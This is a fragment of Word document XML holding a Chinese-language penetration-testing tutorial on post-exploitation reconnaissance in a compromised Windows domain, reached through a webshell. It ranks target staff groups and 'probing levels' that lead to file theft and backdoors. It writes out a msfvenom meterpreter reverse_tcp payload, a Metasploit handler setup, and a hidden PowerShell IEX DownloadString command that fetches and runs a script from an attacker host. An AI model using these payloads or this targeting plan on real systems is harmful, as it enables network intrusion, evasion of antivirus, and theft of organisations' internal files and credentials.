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54.600pt;margin-top:390.600pt;width:400.800pt;height:353.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index: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e4e4e"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>目标资</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="4e4e4e"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>产信息搜集的程度，决定渗透过程的复杂程度。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e4e4e"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>目标主</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="4e4e4e"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>机信息搜集的深度，决定后渗透权限持续把控。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e4e4e"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>渗透的本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="4e4e4e"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>质是信息搜集，而信息搜集整理为后续的情报跟进提供了强大的保证。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9179" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="4e4e4e"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>----Microp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="4e4e4e"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oor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e4e4e"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>文章将连载，从几方面论证，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="fe0000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>渗透的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="fe0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本质是信息搜集。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e4e4e"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>一次完整的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="4e4e4e"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>网络渗透，不仅仅是与目标管理人员的权限争夺，一次完整的网络渗透，它分为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e4e4e"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>两大块，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="fe0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>技术业务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="4e4e4e"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="fe0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>信息分析业务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="4e4e4e"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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93" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="4e4e4e"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="fe0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>技术业务要辅助并且要为信息分析业务提供强大的支撑与保证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="4e4e4e"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。同时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="fe0000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>信</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="fe0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>息分析业务要为技</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="fe0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>术业务提供关键的目标信息分析逻辑关系与渗透方向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="4e4e4e"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w: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案例如下：(</w:t>
      </w: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非root/administrator下主动信息搜集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)（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有马赛克）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在得到一个webshe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ll时，非root/administrator情况下对目标信息搜集至关重要，它会影响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后期</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的渗透是否顺利，以及渗透方向。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目标主机分配了2个内网IP，分别为10.0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.0.X与192.168.100.X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5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得知部分服务软件，以及杀毒软件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-47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NOD32，一般内网中为杀毒为集体一致。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262.800pt;height:502.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId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9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搜集补丁更新频率，以及系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> 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状况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105.600pt;height:325.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId9" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:414.600pt;width:181.800pt;height:39.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId10" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:472.800pt;width:449.400pt;height:167.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index: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3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搜集</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>安装软件以及版本，路径等。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域中用户如下。目前权限为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iis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apppool\xxxx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333.600pt;height:484.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId1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1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正如上面所</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>说，技术业务需要辅助分析业务。在域组中，其中有几个组需要特别关注，在一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般的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>大型内网渗透中，需要关注大致几个组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（1）IT组/研发组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>他们掌握在大量的内网密码，数据库密码等。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63" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（2）秘书组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>他们掌握着大量的目标机构的内部传达文件，为信息分析业务提供信息，在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反馈</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>给技术业务来确定渗透方向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（3）domain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admins组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root/administrator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（4）财务组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="1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他们掌握着大量的资金往来与目标企业的规划发展，并且可以通过资金，来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判</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>断出目标组织的整体架构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（5）CXX组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="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ceo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="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cto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="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coo等，不同的目标组织名字不同，如部长，厂长，经理等。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267.600pt;height:280.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId13" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:558.600pt;width:318.600pt;height:126.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId14" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:725.400pt;width:361.800pt;height:36.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId1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1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以研发中心为例：研</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>发中心共计4人。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并且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>开始规划信息刺探等级：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等级1</w:t>
      </w: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：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确定某部门具体人员数量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-43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如研发中心4人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298" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>等级2：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确定该部门的英文用户名的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>具体信息，如姓名，联系方式，邮箱，职务等。以便确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定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>下一步攻击方向</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="4255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等级3：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>分别刺探白天/夜间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> 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内网中所存活机器并且对应IP地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>等级4：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对应人</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>员的工作机内网IP，以及工作时间</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1298" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>等级5：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根据信息业务反馈，制定目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>标安全时间，以便拖拽指定人员文件，或登录目标机器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>等级6：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制定目标机器后渗透与持续渗透的方式以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>及后门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刺</w:t>
      </w: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探等级1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刺</w:t>
      </w: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探等级2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304.800pt;height:291.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index: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23" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1283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在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="2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net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t> 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user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="2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/domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="3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后得到域中用户，但需要在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非root/administrator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权限下得到更多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的信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>来给信息分析业务提供数据，并确定攻击方向。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在案例中针对nod32，采用powershell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-47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payload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323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="2078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msfvenom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-p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windows/x64/meterpreter/reverse_tcp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LHOST=xxx.xxx.xxx.xxx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LPORT=xx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-f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psh-reflection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-2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&gt;xx.ps1</w:t>
      </w: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2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exploit/multi/handler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120" w:right="2331" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000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exploit(handler)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set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-1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payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-1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windows/x64/meterpreter/reverse_tcp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payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="12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=&gt;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windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="5409" w:firstLine="0"/>
      </w:pP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exploit(handler)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18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set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lhost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xxx.xxx.xxx.xxx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lhost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=&gt;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xxx.xxx.xxx.xxx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="6685" w:firstLine="0"/>
      </w:pP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exploit(handler)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5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set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lport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xxx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lport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=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-3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xxx</w:t>
      </w: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28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2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run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323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="3086" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>powershell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-windowstyle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hidden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-exec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bypass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-c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"IEX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="2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(New-Object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Net.WebClient).DownloadString('http://xxx.xx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x.xxx.xxx/xxx.ps1');"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注意区分目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标及系统是32位还是64位。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05.600pt;height:132.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId17" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:199.800pt;width:467.400pt;height:70.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId18" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:288.600pt;width:467.400pt;height:41.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId19" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:348.600pt;width:390.600pt;height:75.599pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId20" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:442.800pt;width:467.400pt;height:77.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId2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接下来将会用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IIS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APPPOOL\XXXX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的权限来搜集更多有趣的信息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367.800pt;height:341.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId22" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:429.600pt;width:403.800pt;height:74.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId23" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:522.600pt;width:424.800pt;height:249.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId2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某数据库配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-3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for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-3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mssql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90.599pt;width:408.600pt;height:498.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId2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白天测试段10.0.0.x段在线主机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> 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for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-3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（部分）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6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10.0.0.x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-51"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>段信息刺探：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IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
